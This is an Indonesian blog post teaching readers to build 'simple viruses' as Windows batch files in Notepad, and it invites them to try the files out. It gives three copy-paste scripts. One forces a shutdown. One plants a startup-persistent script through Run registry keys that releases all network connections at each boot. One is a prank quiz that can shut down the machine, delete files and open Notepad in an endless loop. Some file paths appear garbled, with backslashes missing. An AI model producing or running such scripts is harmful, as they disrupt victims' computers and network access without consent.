Tuesday, November 20, 2018

Cara Membuat Virus Sederhana Menggunakan NotePad


Cara Membuat Virus Sederhana Menggunakan NotePad

Pada postingan kali ini kita akan belajar membuat virus sederhana dengan menggunakan notepad. Sebelumnya kita akan mengenali virus ini terlebih dahulu sebelum kita akan membuat virus sederhananya di dalam notepad. Untuk itu kita perlu yang namanya sebuah pengertian dasar dari sebuah virus.

Pengertian Virus
Virus adalah sebuah software yang menggangu komputer, mulai dari process, hardware sampai perangkat lunak yang ada didalamnya sekalipun. Virus memilik banyak sekali nama , ada yang berbahaya namun juga ada yang tidak berbahaya. Virus yang berbahaya namanya malware. Malware ini sangat berbahaya sekali jika kita terkena. Dampaknya bisa berupa penyadapan, kehilangan kendali sistem, hingga hilangnya akses untuk membuaka folder di komputer. Berbahaya sekali bukan ? Oleh karena itu kita harus hati-hati dengan namaya virus. Jangan langsung download file dari internet tanpa dengan jelas siapa atau dari mana sumbernya, kemungkinan itu virus.

Namun, kali ini kita akan mencoba membuat virus sederhana yang dapat dilakukan oleh siapa saja. adal beberapa contoh virus yang bisa kita buat dengan notepad ini.

1. Virus Shutdown Komputer

@echo off msg * I don't like you shutdown -c "Error! Komputer kamu terpaksa harus Shutdown!" -s

Copy + Paste kan syntax diatas kedalam notepad, lalu save dengan extensi .bat dengan type file nya All files.

2. Mematikan Internet Secara Permanen


echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE

Copy + Paste kan syntaxnya diatas kedalam notepad, lalu save dengan ekstensi .bat dengan type file nya All files.

3. Virus Jahil

@echo off title Kuis hari ini! :menu cls echo Jika kamu kena virus apa yang kamu lakukan? pause echo pilih yang mana: echo 1. Matiin komputer echo 2. Format aja echo 3. Nangis echo 4. Beli komputer baru set input=nothing set /p input=Choice: if %input%==1 shutdown -s -t 30 if %input%==2 del c:xxx if %input%==3 @ECHO off msg * Muka lu jelek msg * Ngaca dulu gih! msg * Hayo lu, CPU lu gw acak-acak ya msg * Udah, install ulang aja msg * Mau kelar kan masalahnya? @ECHO off :top START %SystemRoot% system32notepad.exe GOTO top

Copy + Paste kan syntaxnya diatas kedalam notepad, lalu save dengan extensi .bat dengan type file nya All Files.

Itulah tadi cara mudah membuat virus sederhana dengan menggunakan notepad. Sebenarnya masih banyak namun 3 diatas adalah yang paling menarik menurut saya, so jangan lupa untuk dicobain dan jangan lupa untuk dibuka sendiri wkwk..



EmoticonEmoticon